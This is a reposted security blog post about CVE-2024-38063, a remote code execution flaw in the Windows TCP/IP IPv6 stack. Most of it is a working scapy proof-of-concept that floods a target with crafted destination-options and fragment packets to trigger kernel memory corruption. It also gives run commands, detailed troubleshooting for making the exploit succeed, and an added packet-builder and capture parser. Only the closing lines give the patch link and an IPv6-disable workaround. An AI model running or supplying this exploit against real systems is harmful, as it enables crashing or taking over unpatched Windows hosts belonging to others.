Windows TCP/IP IPv6 RCE POC(CVE-2024-38063)

admin · 2024-09-28 10:16:04 · 20 views · 3,687 characters · 12 min 17 s read


Affected versions:

  • Windows 11 Version 24H2 for x64-based Systems
  • Windows 11 Version 24H2 for ARM64-based Systems
  • Windows Server 2012 R2 (Server Core installation)
  • Windows Server 2012 R2
  • Windows Server 2012 (Server Core installation)
  • Windows Server 2012
  • Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)
  • Windows Server 2008 R2 for x64-based Systems Service Pack 1
  • Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)
  • Windows Server 2008 for x64-based Systems Service Pack 2
  • Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)
  • Windows Server 2008 for 32-bit Systems Service Pack 2
  • Windows Server 2016 (Server Core installation)
  • Windows Server 2016
  • Windows 10 Version 1607 for x64-based Systems
  • Windows 10 Version 1607 for 32-bit Systems
  • Windows 10 for x64-based Systems
  • Windows 10 for 32-bit Systems
  • Windows Server 2022, 23H2 Edition (Server Core installation)
  • Windows 11 Version 23H2 for x64-based Systems
  • Windows 11 Version 23H2 for ARM64-based Systems
  • Windows 10 Version 22H2 for 32-bit Systems
  • Windows 10 Version 22H2 for ARM64-based Systems
  • Windows 10 Version 22H2 for x64-based Systems
  • Windows 11 Version 22H2 for x64-based Systems
  • Windows 11 Version 22H2 for ARM64-based Systems
  • Windows 10 Version 21H2 for x64-based Systems
  • Windows 10 Version 21H2 for ARM64-based Systems
  • Windows 10 Version 21H2 for 32-bit Systems
  • Windows 11 version 21H2 for ARM64-based Systems
  • Windows 11 version 21H2 for x64-based Systems
  • Windows Server 2022 (Server Core installation)
  • Windows Server 2022
  • Windows Server 2019 (Server Core installation)
  • Windows Server 2019
  • Windows 10 Version 1809 for ARM64-based Systems
  • Windows 10 Version 1809 for x64-based Systems
  • Windows 10 Version 1809 for 32-bit Systems

Verification script

from scapy.all import *
import sys
import time

# Fill these in before running: the interface to send from, the target's IPv6
# address and, if scapy cannot resolve it itself (see troubleshooting), its MAC.
iface = ''
ip_addr = ''
mac_addr = ''
num_tries = 20
num_batches = 20

if not ip_addr:
    sys.exit("set ip_addr (and iface / mac_addr as needed) before running")


def get_packets_with_mac(i):
    # Same three packets as get_packets(), with an explicit Ethernet header so
    # scapy does not have to resolve the target's MAC address itself.
    frag_id = 0xdebac1e + i
    first = Ether(dst=mac_addr) / IPv6(fl=1, hlim=64+i, dst=ip_addr) / IPv6ExtHdrDestOpt(options=[PadN(otype=0x81, optdata='a'*3)])
    second = Ether(dst=mac_addr) / IPv6(fl=1, hlim=64+i, dst=ip_addr) / IPv6ExtHdrFragment(id=frag_id, m=1, offset=0) / 'aaaaaaaa'
    third = Ether(dst=mac_addr) / IPv6(fl=1, hlim=64+i, dst=ip_addr) / IPv6ExtHdrFragment(id=frag_id, m=0, offset=1)
    return [first, second, third]


def get_packets(i):
    if mac_addr != '':
        return get_packets_with_mac(i)
    frag_id = 0xdebac1e + i
    # 1) Destination Options header carrying an option of type 0x81 with 3 bytes of data
    first = IPv6(fl=1, hlim=64+i, dst=ip_addr) / IPv6ExtHdrDestOpt(options=[PadN(otype=0x81, optdata='a'*3)])
    # 2) first fragment (offset 0, more-fragments set) carrying 8 bytes of payload
    second = IPv6(fl=1, hlim=64+i, dst=ip_addr) / IPv6ExtHdrFragment(id=frag_id, m=1, offset=0) / 'aaaaaaaa'
    # 3) last fragment (offset 1, more-fragments clear) with no payload at all
    third = IPv6(fl=1, hlim=64+i, dst=ip_addr) / IPv6ExtHdrFragment(id=frag_id, m=0, offset=1)
    return [first, second, third]


# Each try uses its own hop limit and fragment id; every triple is queued twice per batch.
final_ps = []
for _ in range(num_batches):
    for i in range(num_tries):
        final_ps += get_packets(i) + get_packets(i)

print("Sending packets")
if mac_addr != '':
    sendp(final_ps, iface=iface or None)   # layer 2: we supplied the Ethernet header
else:
    send(final_ps, iface=iface or None)    # layer 3: scapy resolves the next hop itself

for i in range(60):
    print(f"Memory corruption will be triggered in {60-i} seconds", end='\r')
    time.sleep(1)
print("")

Usage (the IP configuration in the script must be filled in first)

pip3 install scapy
python3 cve-2024-38063.py

Troubleshooting when the script does not work

If it does not work, it may be because:

  • The target system is not reachable over IPv6:

    • Disable the Windows firewall

    • From your host, run ping -6 {ipv6_address}

    • Make sure you get replies

    • Re-enable the firewall

  • The target system is not receiving the packets:

    • Install Wireshark on the target system and check whether the packets the script sends actually arrive

  • scapy reports "MAC address to reach destination not found. Using broadcast.":

    • You need to find the target machine's MAC address

    • This can be done by running the ping command above and inspecting the reply in Wireshark (the Ethernet source address field)

    • You can also use scapy: Ether(raw(sr1(IPv6(dst={your_dest_ip})/ICMPv6EchoRequest()))).src, but sometimes this does not work

    • Once you have the MAC address, put it in the script's mac_addr field and run the script

  • Packets are not being coalesced on the target system:

    • Depending on your network adapter/driver, it can be hard to get Windows to coalesce packets without flooding the target DDoS-style.

    • You can try changing adapter settings such as "Packet Coalescing", "Interrupt Moderation", "Interrupt Moderation Rate" and "Receive Segment Coalescing", depending on which are available. For example, setting "Interrupt Moderation Rate" to "Extreme" on my dedicated server made the bug reproduce.

  • If all else fails, you can attach a kernel debugger and check the following:

    • Whether the call chain tcpip!Ipv6pReceiveDestinationOptions -> tcpip!Ipv6pProcessOptions -> tcpip!IppSendErrorList is being hit

    • Break on tcpip!Ipv6pProcessOptions and check whether [rcx] is always zero. If it is, the packets are not being coalesced for some reason.

    • Break on tcpip!Ipv6pReceiveFragment and check whether [rcx+0x30] is zero. If it is not, the bug did not trigger for some reason.
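The following is an added example, not code from the original post or from the PoC's author. It rebuilds the three packets that get_packets(i) in the verification script emits using only the Python standard library (no scapy), so the exact bytes the script puts on the wire can be inspected without sending anything, and it adds a small Ethernet/IPv6 extension-header parser for two of the troubleshooting steps above: confirming that frames captured on the target have the shape of the script's packets, and reading the target's MAC out of the Ethernet source address of its Echo Reply. The MAC and IPv6 addresses and the echo-reply frame are constructed sample data; the ICMPv6 checksum is left at zero and is not verified.

```python
# Added example, not code from the original post: stdlib-only rebuild of the three IPv6
# packets get_packets() emits, plus a parser for Ethernet/IPv6 extension-header chains.
# Nothing is sent; the MACs, addresses and echo reply below are constructed sample data.
import struct
import ipaddress

ETH_P_IPV6 = 0x86DD
NH_FRAGMENT, NH_ICMPV6, NH_NONE, NH_DEST_OPTS = 44, 58, 59, 60
ATTACKER_MAC, TARGET_MAC = "02:00:00:00:00:01", "02:00:00:00:00:02"   # constructed
ATTACKER_IP, TARGET_IP = "2001:db8::1", "2001:db8::2"                 # constructed

def mac_bytes(mac): return bytes.fromhex(mac.replace(":", ""))
def mac_str(raw): return ":".join(f"{b:02x}" for b in raw)

def ether(dst, src, payload):
    """Ethernet II frame carrying IPv6, like scapy's Ether(dst=mac_addr)/IPv6(...)."""
    return mac_bytes(dst) + mac_bytes(src) + struct.pack("!H", ETH_P_IPV6) + payload

def ipv6(src, dst, nh, payload, hlim=64, fl=1):
    """Fixed IPv6 header: version 6, traffic class 0, flow label fl (the script sets fl=1)."""
    head = struct.pack("!IHBB", (6 << 28) | fl, len(payload), nh, hlim)
    return head + ipaddress.IPv6Address(src).packed + ipaddress.IPv6Address(dst).packed + payload

def dest_opts(nh, tlvs):
    """Destination Options header, padded to 8 bytes with Pad1/PadN as scapy does."""
    pad = (-(len(tlvs) + 2)) % 8
    tlvs += b"\x00" * pad if pad < 2 else bytes([1, pad - 2]) + b"\x00" * (pad - 2)
    return struct.pack("!BB", nh, (len(tlvs) + 2) // 8 - 1) + tlvs   # Hdr Ext Len in 8-octet units

def fragment(nh, frag_id, offset, more):
    """Fragment header: 13-bit offset in 8-octet units, 2 reserved bits, M flag, 32-bit id."""
    return struct.pack("!BBHI", nh, 0, (offset << 3) | int(more), frag_id)

def poc_packets(i, src, dst):
    """Byte-for-byte equivalent (IPv6 layer and up) of get_packets(i) in the script."""
    frag_id = 0xDEBAC1E + i
    opt = bytes([0x81, 3]) + b"aaa"     # option type 0x81, length 3: PadN(otype=0x81, optdata='a'*3)
    first = ipv6(src, dst, NH_DEST_OPTS, dest_opts(NH_NONE, opt), hlim=64 + i)
    second = ipv6(src, dst, NH_FRAGMENT, fragment(NH_NONE, frag_id, 0, True) + b"a" * 8, hlim=64 + i)
    third = ipv6(src, dst, NH_FRAGMENT, fragment(NH_NONE, frag_id, 1, False), hlim=64 + i)
    return [first, second, third]

def parse_tlvs(data):
    """Option TLVs of a Destination Options header; type 0 is the one-byte Pad1."""
    opts, i = [], 0
    while i < len(data):
        length = 0 if data[i] == 0 else data[i + 1]
        opts.append((data[i], bytes(data[i + 2:i + 2 + length])))
        i += 1 if data[i] == 0 else 2 + length
    return opts

def parse_frame(frame):
    """Ether -> IPv6 -> extension headers; returns eth source, addresses, hop limit, header chain."""
    if struct.unpack("!H", frame[12:14])[0] != ETH_P_IPV6:
        raise ValueError("not an IPv6 frame")
    pkt = frame[14:]
    vtf, plen, nh, hlim = struct.unpack("!IHBB", pkt[:8])
    if vtf >> 28 != 6 or len(pkt) < 40 + plen:
        raise ValueError("bad or truncated IPv6 header")
    body, off, chain = pkt[40:40 + plen], 0, []
    while nh in (NH_DEST_OPTS, NH_FRAGMENT):
        if nh == NH_DEST_OPTS:
            ext_len = (body[off + 1] + 1) * 8
            chain.append(("dest_opts", parse_tlvs(body[off + 2:off + ext_len])))
            nh, off = body[off], off + ext_len
        else:
            nxt, _, offm, fid = struct.unpack("!BBHI", body[off:off + 8])
            chain.append(("fragment", {"id": fid, "offset": offm >> 3, "m": offm & 1}))
            nh, off = nxt, off + 8
    if nh == NH_ICMPV6:
        chain.append(("icmpv6", {"type": body[off], "code": body[off + 1]}))
    else:   # No Next Header (59) or an upper layer this example does not decode
        chain.append(("end", {"nh": nh, "trailing": len(body) - off}))
    return {"eth_src": mac_str(frame[6:12]), "src": ipaddress.IPv6Address(pkt[8:24]),
            "dst": ipaddress.IPv6Address(pkt[24:40]), "hlim": hlim, "chain": chain}

def mac_from_echo_reply(frame, target_ip):
    """Troubleshooting step: the target's MAC is the Ethernet source of its Echo Reply (type 129)."""
    p = parse_frame(frame)
    ok = p["src"] == ipaddress.IPv6Address(target_ip) and p["chain"][-1] == ("icmpv6", {"type": 129, "code": 0})
    return p["eth_src"] if ok else None

def matches_poc_shape(frame):
    """True for frames shaped like the script's 1st or 3rd packet (option 0x81, or empty last fragment)."""
    chain = parse_frame(frame)["chain"]
    for kind, info in chain:
        if kind == "dest_opts" and any(t == 0x81 for t, _ in info):
            return True
        if kind == "fragment" and info["m"] == 0 and info["offset"] > 0 and chain[-1] == ("end", {"nh": NH_NONE, "trailing": 0}):
            return True
    return False

def sample_poc_frames(i=0):
    return [ether(TARGET_MAC, ATTACKER_MAC, p) for p in poc_packets(i, ATTACKER_IP, TARGET_IP)]

def sample_echo_reply():
    icmp = struct.pack("!BBHHH", 129, 0, 0, 1, 1)   # type 129, code 0, checksum left 0, id 1, seq 1
    return ether(ATTACKER_MAC, TARGET_MAC, ipv6(TARGET_IP, ATTACKER_IP, NH_ICMPV6, icmp, fl=0))

if __name__ == "__main__":
    for f in sample_poc_frames():
        print(parse_frame(f)["chain"], "PoC-shaped" if matches_poc_shape(f) else "")
    print("target MAC:", mac_from_echo_reply(sample_echo_reply(), TARGET_IP))
```

To use this against a real capture, select a frame in Wireshark on the target, copy it as a hex stream, and pass bytes.fromhex(...) to parse_frame(): a chain containing ("dest_opts", [(0x81, b"aaa"), ...]) or a fragment with m=0 and no trailing data means the script's packets are arriving; a frame whose chain ends in ("icmpv6", {"type": 129, ...}) from the target address gives you the mac_addr value for the script.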

Official fix

The vendor has released a patch; see https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-38063

Temporary workaround:

Following Microsoft's official guidance, disabling IPv6 on the server mitigates this vulnerability until the patch is applied. Note, however, that disabling IPv6 can cause unexpected problems, so weigh this against your own environment before doing so.

Originally published on the WeChat public account 信安王子: Windows TCP/IP IPv6 RCE POC(CVE-2024-38063)

Reposted from CN-SEC (please keep this link when reposting; thanks to the original author): Windows TCP/IP IPv6 RCE POC(CVE-2024-38063) https://cn-sec.com/archives/3108262.html
